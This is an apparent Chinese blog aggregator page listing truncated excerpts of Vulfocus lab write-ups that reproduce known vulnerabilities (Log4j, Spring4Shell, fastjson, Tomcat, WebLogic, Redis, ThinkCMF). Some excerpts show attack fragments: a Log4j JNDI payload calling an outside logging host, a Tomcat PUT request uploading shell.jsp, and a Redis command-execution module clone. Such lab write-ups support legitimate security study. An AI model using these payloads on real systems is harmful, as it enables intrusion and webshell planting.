代码编织梦想

confluence ognl 注入 (cve-爱代码爱编程

漏洞描述 Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。 2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞。OGNL 注入漏洞允许未经身份验证的用户在 Confluence

【vulfocus漏洞复现-初级】solr 代码执行 (cve-2019-12409)-爱代码爱编程

solr 代码执行 (CVE-2019-12409) 漏洞简介 Java ManagementExtensions(JMX)是一种Java技术,为管理和监视应用程序、系统对象、设备(如打印机)和面向服务的网络提供相应的工

【Vulfocus漏洞复现】spring-core-rce-2022-03-29-爱代码爱编程

2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。 通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基

【Vulfocus漏洞复现】log4j2-cve-2021-44228-爱代码爱编程

vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:64936/ 访问靶场环境http://123.58.236.76:64936/ 点击??? burp抓包,DNSlog验证漏洞是否存在 构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回

【Vulfocus漏洞复现】fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238-爱代码爱编程

vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:24477/ 访问靶场环境:http://123.58.236.76:24477/ burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞 准备两个东西:Exploit.class、marshalsec-0.

【Vulfocus漏洞复现】tomcat-cve_2017_12615-爱代码爱编程

访问目标 http://123.58.236.76:15450/ burp抓包 修改请求方式为PUT,增加POST请求体 PUT /shell.jsp/ HTTP/1.1 Host: 123.58.236.76:15450 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Age

【Vulfocus漏洞复现】weblogic-cve_2018_2894-爱代码爱编程

漏洞描述 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do 影响范围 weblogic 10.3.6.0 weblogic 12.1.3.0 weblogic 12.2.1.2 weblogic 12.2.1.3 漏洞复现 访

【Vulfocus漏洞复现】redis-cnvd_2019_21763、redis-cnvd_2015_07557-爱代码爱编程

vps:腾讯云 centos8 本地:windows11 靶场环境:http://123.58.236.76:47109/ 在vps上执行以下命令 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand cd RedisModules-ExecuteCommand/ make

[vulfocus漏洞复现]thinkcmf 代码执行漏洞复现 (CVE-2019-7580)phpinfo();ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPH-爱代码爱编程

前言 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于ThinkPHP开发. thinkcmf5.0.19 这个版本后台提供路由自定义,其中路由的别名对单引号缺少过滤,导致引发漏洞。 文章也会在这里同步 0x01进入后台 进入后台路径为:http://ip:port/admin 0x02我们这里使用弱口令登录 账